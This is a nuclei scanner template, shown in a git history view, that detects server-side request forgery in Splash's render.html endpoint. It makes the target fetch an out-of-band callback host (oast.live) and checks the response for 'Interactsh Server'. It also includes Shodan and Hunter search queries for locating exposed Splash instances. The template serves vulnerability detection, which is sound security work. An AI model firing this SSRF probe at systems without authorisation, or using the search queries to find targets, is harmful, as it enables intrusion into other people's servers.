nuclei-templates/http/vulnerabilities/splash/splash-render-ssrf.yaml

32 lines
667 B
YAML
Raw Normal View History

2023-03-16 11:59:02 +00:00
id: splash-render-ssrf
info:
2023-03-27 06:26:00 +00:00
name: Splash Render - SSRF
2023-03-16 11:59:02 +00:00
author: pwnhxl
severity: high
reference:
- https://github.com/scrapinghub/splash
2023-03-17 10:33:40 +00:00
- https://b1ngz.github.io/splash-ssrf-to-get-server-root-privilege/
2023-03-16 11:59:02 +00:00
metadata:
max-request: 1
2023-03-16 23:00:41 +00:00
verified: "true"
shodan-query: title:"Splash"
2023-03-16 11:59:02 +00:00
hunter-query: web.title="Splash" && header="TwistedWeb"
2023-03-27 06:26:00 +00:00
tags: splash,ssrf,oast,oss
2023-03-16 11:59:02 +00:00
http:
2023-03-16 23:00:41 +00:00
- method: GET
path:
2023-03-27 06:26:00 +00:00
- "{{BaseURL}}/render.html?url=https://oast.live"
2023-03-16 11:59:02 +00:00
matchers-condition: and
matchers:
- type: word
2023-03-21 05:38:50 +00:00
part: body
2023-03-16 11:59:02 +00:00
words:
2023-03-27 06:26:00 +00:00
- 'Interactsh Server'
2023-03-16 11:59:02 +00:00
- type: status
status:
- 200